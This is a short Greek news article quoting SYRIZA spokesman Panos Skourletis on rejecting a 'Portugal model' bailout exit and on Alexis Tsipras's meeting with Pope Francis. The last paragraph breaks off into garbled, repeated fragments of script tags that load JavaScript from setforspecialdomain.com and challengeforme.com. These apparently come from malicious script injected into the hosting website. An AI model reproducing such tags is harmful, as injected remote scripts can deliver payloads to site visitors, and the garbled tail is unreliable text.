Σκουρλέτης: Ο ΣΥΡΙΖΑ δε θα δεχτεί «μοντέλο Πορτογαλίας»

Σκουρλέτης: Ο ΣΥΡΙΖΑ δε θα δεχτεί «μοντέλο Πορτογαλίας»

«Ιστορικής σημασίας η συνάντηση του Αλέξη Τσίπρα με τον Πάπα»

Ο ΣΥΡΙΖΑ δεν πρόκειται να δεχτεί «μοντέλο Πορτογαλίας» για έξοδο της Ελλάδας από το μνημόνιο, ακόμα κι αν ο Αντώνης Σαμαράς μπορέσει να αποσπάσει μία τέτοια δέσμευση από την Άνγκελα Μέρκελ, δήλωσε ο εκπρόσωπος Τύπου της Κουμουνδούρου, Πάνος Σκουρλέτης.

Μιλώντας στον ΣΚΑΪ, ο κ. Σκουρλέρης τόνισε πως στόχος της εξόδου από το μνημόνιο πρέπει να είναι η αλλαγή του «περιεχομένου των μνημονιακών πολιτικών».

«Βασικό ζήτημα για τον ΣΥΡΙΖΑ είναι να διαμορφωθούν στην Ευρώπη οι κατάλληλοι συσχετισμοί δυνάμεων που θα επιτρέψουν τη χαλάρωση του Συμφώνου Σταθερότητας και της δημοσιονομικής πειθαρχίας», είπε, μεταξύ άλλων.

Αναφερόμενος στη συνάντηση του Αλέξη Τσίπρα με τον Πάπα Φραγκίσκο στο Βατικανό, ο κ. Σκουρλέτης έκανε λόγο για μία συνάντηση ιστορικής σημασίας, απορρίπτοντας παράλληλα τα ειρωνικά σχόλια που έγιναν στα μέσα κοινωνικής δικτύωσης.

Ο κ. Σκουρλέτης ανέφερε ότι η συνάντηση ήταν να γίνει πριν τις Ευρωεκλογές, αλλά μετατέθηκε από την Αγία Έδρα προκειμένου να μην χαρακτηριστεί παρέμβαση στην εκλογική διαδικασία, κάτι που ήταν «απολύτως κατανοητό».___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >